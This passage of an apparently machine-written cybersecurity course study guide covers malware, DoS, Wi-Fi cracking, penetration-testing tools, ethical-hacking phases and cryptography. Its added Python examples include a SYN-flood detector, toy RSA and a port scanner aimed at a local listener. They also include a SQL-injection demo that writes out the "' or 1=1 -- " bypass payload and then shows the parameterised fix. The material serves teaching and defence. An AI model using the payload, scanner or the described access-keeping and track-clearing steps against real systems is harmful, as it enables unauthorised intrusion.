    • Firewalls: Firewalls act as virtual walls, filtering incoming and outgoing network traffic based on predefined rules. They protect devices from unauthorized access and malicious data packets. “firewalls are security devices that filter the incoming and outgoing traffic within a private network… the firewall works like a gatekeeper at your computer’s entry point which only welcomes incoming traffic that it has been configured to accept.” Different types of firewalls are mentioned: packet filtering, stateful inspection, and proxy firewalls.

    9. Malware:

    The source discusses different types of malware:

    • Viruses: These are malicious programs that attach themselves to other files and replicate. Types discussed include boot sector viruses (affecting system startup), macro viruses (embedded in documents), and direct action viruses (activate upon execution and then exit). “for the first part we saw the main objective of the virus is to harm the data and information in a system… viruses have the ability to replicate itself to harm multiple files whereas Trojan does not have the replication ability.” Detection methods include system slowdowns, application freezes, data corruption, unexpected logouts, and frequent crashes. The MyDoom virus is mentioned as a famous example.
    • Trojans: Trojans disguise themselves as legitimate software but perform malicious actions once executed. Types discussed include backdoor Trojans (providing remote access), click fraud Trojans (generating fraudulent clicks), and ransomware Trojans (blocking access and demanding payment). “for the Trojan we have stealing of the data files and information… Trojan horses are remote accessed and lastly viruses have the ability to replicate itself to harm multiple files whereas Trojan does not have the replication ability.” Detection includes frequent crashes, slow reaction times, random pop-ups, and changes in system applications and desktop appearance. The Emotet Trojan is mentioned for financial theft.
    • Botnets: These are networks of infected devices (bots) controlled remotely by an attacker (bot herder) to perform large-scale attacks like data theft, server failures, malware propagation, and DoS attacks. The creation process involves preparing the botnet army (infecting devices), establishing connection to the control server, and launching the attack. Architectures include client-server and peer-to-peer models. The Mirai and Zeus botnets are given as examples.

    10. Denial of Service (DoS) Attacks:

    DoS attacks aim to disrupt services by overwhelming a target with traffic, making it unavailable to legitimate users. “a denial of service attack is an attack that aims to make a computer or a network resource unavailable to its intended users by disrupting the service of a host connected to the internet.” The source explains that Distributed Denial of Service (DDoS) attacks involve multiple compromised systems launching attacks simultaneously. Mitigation techniques include over-provisioning bandwidth and using a Content Delivery Network (CDN). A demonstration using the “hping3” tool from Parrot Security to flood a Linux Lite virtual machine with SYN packets showcases the impact of a DoS attack.
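    The SYN flood in the hping3 demo has a simple signature on the defending side: one source opens far more connections than it ever completes. The following detector is an added example, not part of the course material; it runs over constructed packet records (timestamp, source, client-side TCP flags) and the threshold values are assumptions for the demo, not tuned figures.

```python
from collections import defaultdict, deque


def build_sample():
    """Constructed packet records: (timestamp_ms, source_ip, client TCP flags).

    10.0.0.5 completes three normal handshakes (SYN, ACK, data); 203.0.113.7
    sends 500 bare SYNs one millisecond apart and never ACKs, which is the
    traffic shape a SYN flood tool produces.
    """
    normal = []
    for base in (5, 250, 600):
        normal += [(base, "10.0.0.5", "S"), (base + 1, "10.0.0.5", "A"),
                   (base + 2, "10.0.0.5", "PA")]
    flood = [(i, "203.0.113.7", "S") for i in range(500)]
    return normal + flood


def detect_syn_flood(packets, window_ms=1000, threshold=100, max_ack_ratio=0.1):
    """Flag a source whose bare SYNs within one sliding window reach `threshold`
    while it has acknowledged at most `max_ack_ratio` of its SYNs.

    Returns {source: (timestamp_ms of first alert, SYNs in the window then)}.
    Thresholds here are demo assumptions; tune them to the server's real rate.
    """
    syn_times = defaultdict(deque)   # per-source timestamps of bare SYNs in window
    syn_count = defaultdict(int)
    ack_count = defaultdict(int)
    alerts = {}
    for ts, src, flags in sorted(packets):
        if flags == "S":             # bare SYN: handshake opened, not yet completed
            syn_count[src] += 1
            times = syn_times[src]
            times.append(ts)
            while times and ts - times[0] > window_ms:
                times.popleft()      # drop SYNs older than the window
            ack_ratio = ack_count[src] / syn_count[src]
            if (len(times) >= threshold and ack_ratio <= max_ack_ratio
                    and src not in alerts):
                alerts[src] = (ts, len(times))
        elif "A" in flags:           # an ACK shows the source completes handshakes
            ack_count[src] += 1
    return alerts


if __name__ == "__main__":
    for src, (ts, n) in detect_syn_flood(build_sample()).items():
        print(f"{src}: {n} bare SYNs within 1 s by t={ts} ms and no ACKs -> SYN flood")
```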

    11. Wi-Fi Hacking:

    The source demonstrates capturing Wi-Fi handshakes and attempting to crack passwords using tools within Kali Linux (likely the Aircrack-ng suite, although airgeddon is the multi-use bash script mentioned). The process involves using tools to monitor wireless networks, capture the WPA/WPA2 handshake during authentication, and then using brute-force or dictionary attacks against the captured handshake file to recover the Wi-Fi password.

    12. Security Tools (Beyond Kali Specifics):

    The source briefly introduces several key security tools:

    • Wireshark: A network protocol analyzer used for capturing and analyzing network traffic at a microscopic level, aiding in real-time or offline network analysis and identifying traffic patterns. “Wireshark is a popular open-source tool to capture network packets and converts them to human readable binary format it provides every single detail of the organization’s network infrastructure it consists of devices designed to help measure the ins and outs of the network.”
    • airgeddon: Described as a multi-use bash script for Linux systems to hack and audit wireless networks, capable of launching DoS attacks and supporting various Wi-Fi hacking methods.
    • John the Ripper: An open-source password security auditing and recovery tool supporting numerous hash and cipher types, utilizing dictionary attacks and brute-forcing. “John the Ripper is an open-source password security auditing and password recovery tool available for many operating systems John the Ripper Jumbo supports hundreds of hash and cipher types including for user passwords of operating systems web apps groupware database servers network traffic captures encrypted private keys file systems and document files.”
    • Nmap (Network Mapper): A network scanning tool using IP packets to identify devices, open ports, services, and operating systems on a network.
    • Burp Suite: A powerful tool for web application security testing, used for configuring proxies, intercepting and inspecting traffic, and identifying vulnerabilities.
    • Metasploit Framework: A penetration testing tool used for exploit development and execution against identified vulnerabilities, providing a platform for launching attacks and gaining access to systems.

    13. Cryptography Algorithms in Detail:

    The source delves deeper into specific cryptographic algorithms:

    • Hashing: A process that creates a fixed-size output (hash value) from variable-sized input data. Hash functions are generally not reversible without extensive brute-force efforts and are useful for storing passwords securely by comparing hash values instead of plain text.
    • Symmetric Cryptography: Uses the same key for both encryption and decryption.
    • DES (Data Encryption Standard): An older symmetric block cipher with a 56-bit key. Despite its past prominence, its short key length makes it vulnerable to brute-force attacks. The source explains the Feistel structure it uses, involving multiple rounds of substitution and permutation. Different modes of operation (ECB, CBC, CFB, OFB, Counter) are also discussed. Its dominance ended in 2002 when AES replaced it as the standard.
    • AES (Advanced Encryption Standard): A symmetric block cipher with 128-bit block size and key sizes of 128, 192, or 256 bits. It became the NIST standard in 2002 due to DES’s short key length.
    • Asymmetric Cryptography: Uses separate keys for encryption (public key) and decryption (private key).
    • RSA: A public-key signature algorithm and encryption/decryption algorithm. The source explains the key generation process involving two large prime numbers, and the encryption and decryption formulas. It can be used for both securing data exchange and verifying digital signatures.
    • Digital Signatures: Used to verify the authenticity and integrity of data.
    • DSA (Digital Signature Algorithm): A public key signature algorithm. The source outlines the key generation, signature generation (using a hash function and random integer), and signature verification processes. It highlights DSA’s robustness and faster key generation compared to RSA.
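    The RSA key generation, encryption and decryption formulas summarised above, carried through in code. This is an added example, not the course's own material: it uses the textbook primes 61 and 53 (n = 3233) so every value can be checked by hand, and it signs a SHA-256 digest reduced mod n; a real deployment uses primes of at least 1024 bits and a padding scheme (OAEP, PSS), which the bare formulas omit.

```python
import hashlib
from math import gcd


def rsa_keygen(p, q, e=17):
    """Public (n, e) and private (n, d) from two primes.

    n = p*q and phi = (p-1)(q-1); e must be coprime to phi and d is the
    inverse of e mod phi, so that (m^e)^d = m mod n for every message m.
    """
    n, phi = p * q, (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)              # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def rsa_encrypt(public, m):
    """c = m^e mod n; the message integer must be smaller than n."""
    n, e = public
    if not 0 <= m < n:
        raise ValueError("message integer must lie in [0, n)")
    return pow(m, e, n)


def rsa_decrypt(private, c):
    """m = c^d mod n, possible only with the private exponent d."""
    n, d = private
    return pow(c, d, n)


def digest_mod_n(message, n):
    """SHA-256 digest reduced mod n; with a toy n this keeps only a few bits."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def rsa_sign(private, message):
    """Signature s = H(m)^d mod n: only the private-key holder can produce it."""
    n, d = private
    return pow(digest_mod_n(message, n), d, n)


def rsa_verify(public, message, signature):
    """Anyone holding the public key checks that s^e mod n equals H(m)."""
    n, e = public
    return pow(signature, e, n) == digest_mod_n(message, n)


if __name__ == "__main__":
    pub, priv = rsa_keygen(61, 53)              # n = 3233, e = 17, d = 2753
    c = rsa_encrypt(pub, 65)                    # 2790
    print("ciphertext:", c, "-> decrypted:", rsa_decrypt(priv, c))
    sig = rsa_sign(priv, b"pay 100 to alice")
    print("valid signature verifies:", rsa_verify(pub, b"pay 100 to alice", sig))
    # An altered signature always fails: x -> x^e mod n is a permutation of Z_n.
    altered = (sig + 1) % 3233
    print("altered signature verifies:", rsa_verify(pub, b"pay 100 to alice", altered))
```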

    14. Ethical Considerations and AI in Cyber Security:

    The document touches upon the ethical use of hacking techniques, emphasizing the importance of permission and controlled environments. It also introduces “HackerGPT,” an AI language model trained in cybersecurity, capable of answering questions, providing code snippets for tasks like port scanning and log monitoring, and explaining security concepts like SQL injection and Burp Suite configuration. This suggests the growing role of AI in both offensive and defensive cybersecurity practices.

    15. Penetration Testing Methodologies (Types):

    The source categorizes penetration testing based on the tester’s knowledge of the system:

    • Black Box Testing: The tester has no prior knowledge, simulating an external attacker.
    • White Box Testing: The tester has full access to system details, simulating an insider threat or a highly informed attacker.
    • Gray Box Testing: The tester has partial knowledge, such as user credentials or limited architecture details.

    16. Installation of Security Tools on Kali Linux:

    The document provides a practical guide to installing essential penetration testing tools on Kali Linux using the sudo apt install command. Tools mentioned include Nmap, Whois, Dig (DNS utilities), Nikto, WPScan, OpenVAS (Greenbone Vulnerability Manager), and Metasploit Framework. It also demonstrates checking the versions of some of these tools.

    Conclusion:

    The provided source material offers a comprehensive overview of various cybersecurity concepts, ranging from social engineering tactics to advanced cryptographic algorithms and practical penetration testing methodologies. It highlights the importance of understanding both offensive and defensive security techniques and introduces the role of specialized tools like Kali Linux and the emerging influence of AI in the field. The inclusion of practical demonstrations and tool installation guides provides a valuable introduction to hands-on cybersecurity practices, albeit within ethical and controlled environments.

    General Cyber Security Concepts

    • What are some common social engineering tactics used in cyber attacks? Social engineering exploits human psychology to gain access to systems or information. Common tactics include phishing (fraudulent emails from trusted sources), exploiting curiosity (leaving infected USB drives in public places), and exploiting greed (Nigerian scams, fake lotteries). Attackers often impersonate legitimate entities or create seemingly plausible scenarios to trick individuals into divulging sensitive data or performing malicious actions. Verifying the authenticity of requests and being cautious about unsolicited offers are crucial defenses against these tactics.
    • What is encryption and why is it important for data security? Encryption is the process of scrambling data using a specific algorithm (cryptography) so that it becomes unreadable to unauthorized users. The original data can only be restored (decrypted) by someone possessing the correct key. Encryption is a fundamental security mechanism for keeping data private and secure, especially when transmitted over networks. Even if data is intercepted, without the decryption key, it remains nonsensical to the attacker. Various algorithms exist, and their complexity determines the difficulty of breaking the encryption.
    • What is cryptanalysis and what are some common techniques used in it? Cryptanalysis is the process of decrypting encrypted data (ciphertext) without knowing the secret key. It involves reversing the encryption algorithm to figure out the original message. Common cryptanalysis techniques include brute-force attacks (trying every possible key combination), dictionary attacks (using a list of potential passwords or keys), and rainbow table attacks (comparing ciphertext with pre-calculated hashes to find matches). The success and time required for these techniques vary depending on the strength of the encryption and the resources available to the attacker.
    • What are the differences between white hat, black hat, and gray hat hackers? Hackers are often categorized by their ethical intentions. White hat hackers (ethical hackers) use their skills to identify vulnerabilities in systems and networks with the permission of the owner, with the goal of improving security. They perform penetration testing and report findings to help organizations patch weaknesses. Black hat hackers, on the other hand, use their skills for malicious purposes, such as stealing data, disrupting services, or financial gain, without authorization. Gray hat hackers operate in a less defined area; they may sometimes act without permission but without malicious intent, often disclosing vulnerabilities they find publicly or to the affected organization.

    Ethical Hacking and Penetration Testing

    • What is penetration testing and what are the typical phases involved? Penetration testing is a specific type of ethical hacking that focuses on actively attempting to penetrate information systems using various attack methods. The goal is to identify and exploit vulnerabilities to assess the security posture of a system or network. The typical phases of penetration testing include:
    1. Reconnaissance (Information Gathering): Collecting as much information as possible about the target, including IP addresses, domains, network architecture, and operating systems.
    2. Scanning: Using tools to identify open ports, services running, and potential vulnerabilities based on the information gathered.
    3. Exploitation: Attempting to exploit the identified vulnerabilities to gain unauthorized access to the system or data.
    4. Post-Exploitation: Once access is gained, exploring the compromised system to understand the extent of the breach and potential impact.
    5. Reporting: Documenting the findings, including the vulnerabilities identified, the methods used to exploit them, and recommendations for remediation.
    • What is SQL injection and how can it be exploited? SQL injection is a web application vulnerability that allows an attacker to inject malicious SQL code into an application’s database queries. This can happen when user input is not properly sanitized before being used in a SQL query. By crafting malformed queries, attackers can bypass authentication, extract sensitive data, modify database content, or even execute arbitrary commands on the database server. Exploitation often involves using special SQL characters and operators (like single quotes, OR, 1=1) in input fields to manipulate the logic of the queries sent to the database. Different types of SQL injection attacks exist, including in-band (error-based and union-based), blind (boolean-based and time-based), and out-of-band.
    • What is a Denial of Service (DoS) attack and how can it impact a system or network? A Denial of Service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users by disrupting the service of a host connected to the internet. This is typically achieved by flooding the target with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. A Distributed Denial of Service (DDoS) attack uses multiple compromised computer systems to attack a single target, amplifying the impact. DoS/DDoS attacks can lead to service outages, financial losses, and reputational damage. Mitigation strategies include over-provisioning bandwidth, using Content Delivery Networks (CDNs), and implementing traffic filtering and rate limiting.
    • What is Wi-Fi hacking and what tools are commonly used for it? Wi-Fi hacking refers to the process of attempting to gain unauthorized access to a wireless network. Common tools used for this purpose include Aircrack-ng (a suite of tools for packet sniffing, password cracking, and more), and tools within Kali Linux. Techniques often involve capturing the WPA/WPA2 handshake (a four-way exchange that occurs when a device connects to a Wi-Fi network) and then attempting to crack the password offline using brute-force or dictionary attacks. These tools can also be used for legitimate security auditing of wireless networks to identify vulnerabilities. It’s crucial to have permission before attempting to audit or penetrate any wireless network.
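    The login-bypass and user-lookup injections from the Kali demonstration in section 7, and the explanation of SQL injection in the answer above, rely on one thing: user input being concatenated into the query text. The following is an added example, not code from the course; it runs the page's payload against a constructed in-memory SQLite table through a string-built query and then through the parameterised form the developer should have written, which is the fix the source says lies with the application.

```python
import sqlite3

# The demo's login-bypass input written out: the quote closes the string
# literal, `or 1=1` makes the WHERE clause always true, `-- ` comments out the rest.
PAYLOAD = "' or 1=1 -- "


def make_db():
    """Constructed sample data; real systems store salted password hashes, not plaintext."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct-horse"), ("bob", "battery-staple")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation: user input becomes part of the SQL."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password):
    """Parameterised query: the driver binds input as data, never as SQL syntax."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def lookup_vulnerable(conn, username):
    """The user-lookup form from the demo: the same payload returns every row."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, username):
    """Same lookup with a bound parameter: the payload matches no username."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable login with payload:", login_vulnerable(conn, PAYLOAD, "x"))  # True
    print("safe login with payload:", login_safe(conn, PAYLOAD, "x"))              # False
    print("vulnerable lookup returns:", lookup_vulnerable(conn, PAYLOAD))          # all users
    print("safe lookup returns:", lookup_safe(conn, PAYLOAD))                      # []
```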

    Cyber Security Fundamentals: A Comprehensive Overview

    Cyber security fundamentals revolve around the essential principles and practices designed to protect computer systems, networks, and digital information from unauthorized access, use, disclosure, disruption, modification, or destruction. In today’s digital world, where cyber threats are pervasive, cyber security has become more critical than ever.

    Here are some fundamental aspects of cyber security discussed in the sources:

    • The Importance of Cyber Security: With the increasing number of cyber threats, safeguarding networks, applications, and data is a top priority. The demand for skilled cyber security professionals, particularly ethical hackers, is expected to grow significantly. Companies across various industries need these professionals to secure their systems. The potential financial impact of cyber attacks, such as ransomware attacks, which cost institutions billions of dollars, underscores the necessity of robust cyber security measures.
    • Ethical Hacking as a Core Component: Ethical hacking involves using the same tools and techniques as malicious hackers to identify and fix security vulnerabilities before they can be exploited. Ethical hackers, also known as white hat hackers, work with the permission of the system owner to stress-test their platforms and strengthen security. This proactive approach helps organizations prevent data breaches and save billions of dollars.
    • Understanding Threat Actors: It’s crucial to understand the different types of hackers.
    • Black hat hackers exploit security vulnerabilities for monetary gain, often stealing or destroying data. They operate with malicious intent and try to remain anonymous.
    • White hat hackers (ethical hackers) use their skills to identify and remedy security flaws to help organizations improve their security posture. They are authorized to act on the company’s behalf.
    • Grey hat hackers are a blend of both, who may snoop on systems without consent but inform the owner of vulnerabilities, sometimes for a fee.
    • Script kiddies rely on existing hacking tools without much technical understanding.
    • Nation-sponsored hackers are employed by governments for espionage and other purposes.
    • Core Concepts: A thorough introduction to cyber security involves learning the basic terminology, different types of threats, how these threats work, and the fundamental working principles.
    • Networking Fundamentals: A strong grasp of how the internet works, including operating systems, TCP/IP, OSI model, routing, and switching, is absolutely essential for entering the field of cyber security. Understanding network protocols (e.g., TCP/IP), network security principles, and firewall configurations is fundamental for identifying vulnerabilities.
    • Operating Systems Proficiency: Proficiency in various operating systems like Windows, Linux, and macOS is crucial. It allows cyber security professionals to safeguard the fault lines across different platforms as they directly interact with these systems daily.
    • Cryptography: Knowledge of cryptography, including encryption, decryption, cryptographic algorithms, and protocols, is very important in cyber security. Cryptography is the science of securing data through encryption to prevent unauthorized access. Techniques like AES encryption are used to scramble data, making it difficult for attackers to crack.
    • Risk Management: Understanding risk assessment, mitigation strategies, and compliance frameworks like GDPR and HIPAA is a key aspect of cyber security.
    • Cyber Security Laws and Ethics: Awareness of legal and ethical considerations in cyber security is also fundamental.
    • Essential Security Technologies: Familiarity with security technologies such as firewalls, intrusion detection and prevention systems (IDPS), antivirus software, and endpoint security is necessary. Firewalls monitor network traffic and block unauthorized access based on security rules.
    • Vulnerability Assessment and Penetration Testing: Hands-on experience with tools like Nessus, Metasploit, Nmap, and Burp Suite is crucial for identifying and exploiting vulnerabilities to improve security. Penetration testing simulates real-world attacks to uncover weaknesses in systems and networks.
    • Incident Response: Understanding security operations, incident response, threat hunting, log analysis, and Security Information and Event Management (SIEM) is vital for handling security breaches. Collecting system logs is a critical part of incident response and forensic analysis.
    • Secure Coding Practices: Knowledge of secure software development practices and common vulnerabilities like OWASP Top 10 is important for preventing security flaws in applications.
    • Staying Updated: The field of cyber security is constantly evolving, so staying updated with the latest threats and attack methodologies is crucial for effective defense.

    In summary, cyber security fundamentals encompass a broad range of technical knowledge, ethical considerations, and practical skills aimed at protecting digital assets from a growing landscape of cyber threats. A strong foundation in networking, operating systems, cryptography, and ethical hacking principles forms the bedrock of a successful career in this critical field.

    Understanding Ethical Hacking Principles and Practices

    Ethical hacking encompasses a range of concepts centered around proactively identifying and mitigating security vulnerabilities in computer systems, networks, and applications with the permission of the owner. It involves using the same tools and techniques as malicious hackers, but with the intent to improve security rather than to cause harm or personal gain.

    Here are some key ethical hacking concepts discussed in the sources:

    • Definition and Purpose: Ethical hacking is the process of taking security measures to safeguard data and networks from malicious cyber attacks. Ethical hackers use every tool at their disposal to try and breach security barriers and find potential vulnerabilities. The core purpose is to discover weaknesses or vulnerabilities in information systems in a legal and ethical manner. By identifying these flaws, ethical hackers help organizations to strengthen their defenses and protect against real cyber threats.
    • Ethical vs. Malicious Hacking: The key differentiator between ethical (white hat) and malicious (black hat) hacking lies in intent and authorization.
    • Black hat hackers exploit security vulnerabilities for monetary gain, aiming to steal or destroy private data, alter websites, or disrupt networks. They have malicious intent and try to hide their identities.
    • White hat hackers (ethical hackers) perform the same activities but with the consent of the system owner and with the goal of identifying and remedying security flaws. Their intent is to help the organization and improve its security posture.
    • Types of Hackers: Beyond black and white hats, there are also grey hat hackers who operate in a more ambiguous space, potentially snooping without consent but informing owners of vulnerabilities. Script kiddies use existing tools without deep technical understanding. Nation-sponsored hackers conduct cyber activities on behalf of governments, and hacktivists use hacking to promote political agendas. Ethical hacking primarily falls under the domain of white hat activities.
    • Roles and Responsibilities of an Ethical Hacker: Ethical hackers have several responsibilities, including:
    • Conducting security assessments to identify an organization’s security posture by evaluating existing security controls.
    • Identifying and testing vulnerabilities in systems, networks, and applications.
    • Developing tools and scripts to enhance security or to test for vulnerabilities.
    • Performing risk assessments to determine the potential impact of identified vulnerabilities.
    • Developing and recommending security policies.
    • Providing guidance on mitigating or resolving identified weaknesses.
    • Potentially training staff on network security best practices.
    • Documenting findings and compiling detailed reports on vulnerabilities and recommendations.
    • The Ethical Hacking Process: The typical ethical hacking process involves several phases:
    • Reconnaissance (Information Gathering): Collecting as much information as possible about the target system or organization, including network infrastructure, operating systems, and potential weak points. Tools like Nmap and Netdiscover can be used in this phase.
    • Scanning: Identifying open ports, services, and potential vulnerabilities using tools like Nmap and vulnerability scanners like Nessus.
    • Gaining Access (Exploitation): Attempting to exploit identified vulnerabilities to gain unauthorized access to the system or network, often using tools like Metasploit.
    • Maintaining Access: Establishing mechanisms to retain access to the compromised system for further analysis, which might involve installing backdoors or Trojans.
    • Clearing Tracks: Removing any evidence of the hacking activity to avoid detection.
    • Reporting: Documenting all findings, the vulnerabilities discovered, the exploitation process, and providing recommendations for remediation.
    • Essential Skills and Knowledge: A successful ethical hacker requires a diverse set of skills:
    • Strong knowledge of computer networks and protocols (TCP/IP, HTTP, etc.).
    • Proficiency in operating systems such as Windows, Linux, and macOS, including their server versions.
    • Understanding of programming and scripting languages like Python, Java, C++, PHP, Ruby, HTML, and JavaScript for developing scripts, automating tasks, and understanding web applications.
    • Knowledge of web applications and databases, including common vulnerabilities like SQL injection and cross-site scripting (XSS).
    • Familiarity with security technologies like firewalls, intrusion detection/prevention systems (IDS/IPS), antivirus software, and endpoint security.
    • Understanding of cryptography, including encryption and decryption techniques.
    • Awareness of common attack vectors and techniques, including malware, social engineering, and network attacks.
    • Strong problem-solving and analytical thinking skills.
    • Awareness of cyber security laws and ethics.
    • Ethical Hacking Tools: Ethical hackers utilize a wide range of tools for various tasks:
    • Network Scanners: Nmap is a key tool for network discovery and port scanning.
    • Vulnerability Scanners: Nessus and Acunetix are used to identify potential vulnerabilities in systems and web applications.
    • Penetration Testing Frameworks: Metasploit is a powerful framework with a vast collection of exploits for testing vulnerabilities.
    • Packet Analyzers: Wireshark is used to capture and analyze network traffic.
    • Password Cracking Tools: John the Ripper is used for dictionary attacks and brute-force password cracking.
    • Web Application Testing Tools: Burp Suite is a popular tool for testing web application security.
    • SQL Injection Tools: SQLmap automates the process of detecting and exploiting SQL injection vulnerabilities.
    • Kali Linux is a popular Linux distribution specifically designed for penetration testing, containing hundreds of pre-installed ethical hacking tools.
    • Social Engineering: This is a non-technical hacking technique that involves manipulating humans into revealing confidential information or performing actions that compromise security. Common social engineering tactics include phishing, pretexting, and exploiting human curiosity or greed.
    • Importance and Benefits for Organizations: Ethical hacking is crucial for organizations to proactively identify and address security weaknesses before malicious actors can exploit them. This helps in preventing data breaches, minimizing financial losses, and protecting reputation. Regular security audits conducted by ethical hackers help organizations stay ahead of cyber threats and ensure the integrity of their digital infrastructure.
    • Certifications: Obtaining certifications like Certified Ethical Hacker (CEH), Offensive Security Certified Professional (OSCP), and CompTIA Security+ can validate an ethical hacker’s skills and enhance their credibility.
    • Job Roles: The field of ethical hacking offers various job roles, including Ethical Hacker, Penetration Tester, Network Security Engineer, Cyber Security Analyst, Information Security Manager, Security Consultant, and Cyber Security Engineer.
    • Ethical Hacking and Penetration Testing: While often used interchangeably, penetration testing is a specific subset of ethical hacking that focuses on actively attempting to penetrate information systems using various attack methods. Ethical hacking is a broader field that encompasses not only penetration testing but also vulnerability assessments, policy development, and other proactive security measures.

    By understanding these concepts, individuals and organizations can better appreciate the role and importance of ethical hacking in the ongoing battle against cyber threats.

    Security Testing Tools for Ethical Hacking

    Security testing tools are essential for ethical hackers and security professionals to identify, analyze, and exploit vulnerabilities in computer systems, networks, and applications. These tools enable a proactive approach to security, allowing organizations to strengthen their defenses before malicious actors can cause harm.

    Here is a discussion of various security testing tools mentioned in the sources:

    1. Vulnerability Scanners:

    • Nessus: This is an automated vulnerability scanner designed to identify security weaknesses within hosts, operating systems, and networks. It uses a built-in database of known vulnerabilities and scans the target environment to find potential flaws. Ethical hackers use Nessus to discover a list of potential vulnerabilities that can then be further investigated.
    • Acunetix and Arachni: These are examples of application scanners that focus on identifying flaws specifically within web applications. They help security testers understand potential weaknesses like SQL injection or cross-site scripting.
    • OpenVAS (Greenbone Vulnerability Manager): This tool provides a comprehensive vulnerability management system, performing scans to detect vulnerabilities across the target.
    • Netsparker: This is another automated web application security scanner that is configurable and helps secure web applications by identifying reported vulnerabilities.

    2. Penetration Testing Frameworks and Tools:

    • Metasploit: This is a powerful penetration testing framework widely used by both ethical hackers and malicious actors. It contains a vast collection of readymade and custom exploits that can be used to probe for and exploit systemic vulnerabilities in networks and servers. Ethical hackers use Metasploit to validate vulnerabilities identified by scanners and to simulate real-world attacks by crafting or choosing appropriate exploits. It can be used to gain access, and depending on the vulnerability, even run root commands.
    • Burp Suite Professional: This is a popular proxy-based tool used for penetration testing and finding vulnerabilities in web applications. It allows for the evaluation of web application security through hands-on testing.

    3. Network Analysis Tools:

    • Nmap (Network Mapper): This is a free and open-source utility for network discovery and security auditing. It can identify live hosts on a network, the services they are running, their operating systems, and the types of packet filters and firewalls in use. Ethical hackers use Nmap in the early reconnaissance phase to understand the target’s network infrastructure and identify potential entry points through open ports and services.
    • Wireshark: This is a free and open-source packet analyzer used for network troubleshooting, analysis, and security auditing. It captures network traffic at a microscopic level, allowing for detailed analysis of data packets. Ethical hackers use Wireshark to monitor network traffic during vulnerability scans and exploitation attempts, helping them understand the communication flow and analyze the success of their attacks.
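    The following is an added example, not code from the course and not Nmap's own implementation: a TCP connect scan with a banner grab, which is the socket-level core of what a port scanner does in the scanning phase (Nmap adds SYN scans, service fingerprinting, timing control and much more on top of this). The target is a constructed loopback listener that greets with a made-up "SSH-2.0-demo_sshd" banner, so the scan runs offline against a host you are allowed to probe; the hostnames, ports and banner are all assumptions of the demo, and scanning systems you are not authorized to test is illegal.

```python
"""TCP connect scan with banner grab, tested against a constructed local
listener. Added example for this page, not Nmap's code or the course's."""
import socket
import threading


def scan_port(host: str, port: int, timeout: float = 0.5):
    """Classify one port the way a connect scan does.

    open     - the three-way handshake completed (a service accepted us)
    closed   - the host answered with RST (connection refused): nothing listens
    filtered - nothing answered before the timeout, typically a firewall
               silently dropping packets
    Returns (state, banner); the banner is whatever the service sends first.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
    except ConnectionRefusedError:
        sock.close()
        return "closed", ""
    except OSError:  # includes the timeout: no answer at all
        sock.close()
        return "filtered", ""
    try:
        banner = sock.recv(256).decode("ascii", errors="replace").strip()
    except OSError:
        banner = ""
    finally:
        sock.close()
    return "open", banner


def scan_range(host: str, ports, timeout: float = 0.5) -> dict:
    """Scan several ports and return {port: (state, banner)}."""
    return {port: scan_port(host, port, timeout) for port in ports}


def start_fake_service(banner: bytes = b"SSH-2.0-demo_sshd\r\n"):
    """Constructed target: a loopback listener that greets each client with a
    banner, the way sshd does. Returns (server_socket, port); closing the
    socket stops the service."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    server.listen(5)
    port = server.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = server.accept()
            except OSError:
                return  # server socket closed: stop serving
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return server, port


def free_port() -> int:
    """Pick a port nobody is listening on, to show the 'closed' state."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    port = probe.getsockname()[1]
    probe.close()
    return port


def demo() -> dict:
    """Start the fake service, scan it plus one closed port, and return the
    results keyed by the expected state so the outcome is easy to check."""
    server, open_port = start_fake_service()
    closed_port = free_port()
    try:
        results = scan_range("127.0.0.1", [open_port, closed_port])
    finally:
        server.close()
    return {"open": results[open_port], "closed": results[closed_port]}


if __name__ == "__main__":
    for expected, (observed, banner) in demo().items():
        print(f"expected {expected:6s} -> observed {observed:8s} banner={banner!r}")
```

    On a real network the third state matters most: a port that never answers is not proof that nothing listens, only that something between you and the host (or the host's own firewall) is dropping the probe, which is exactly the open/closed/filtered distinction Nmap reports.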

    4. Specific Attack Tools:

    • sqlmap: This is an automated tool specifically designed for detecting and exploiting SQL injection vulnerabilities in web applications. It can automatically craft and execute SQL injection queries to test for flaws and potentially retrieve data from databases.
    • John the Ripper: This is an open-source password security auditing and password recovery tool. It supports various password cracking techniques, including dictionary attacks and brute-force attacks, to test the strength of passwords.
    • airgeddon: This is a multi-use bash script for Linux systems used for auditing wireless networks. It can be used to launch denial-of-service attacks on Wi-Fi networks and supports various Wi-Fi attack methods like WPS attacks and handshake captures.

    5. Operating Systems for Security Testing:

    • Kali Linux: This is a Debian-based Linux distribution specifically designed for penetration testing and security auditing. It comes with hundreds of pre-installed tools targeted towards various information security tasks, including vulnerability assessment, penetration testing, computer forensics, and reverse engineering. Its features, pre-installed tools, and customizability make it a popular choice for ethical hackers.

    The Role of Security Testing Tools in Ethical Hacking:

    Ethical hackers utilize these tools throughout the different phases of penetration testing:

    • Reconnaissance: Tools like Nmap are used to gather information about the target network and systems.
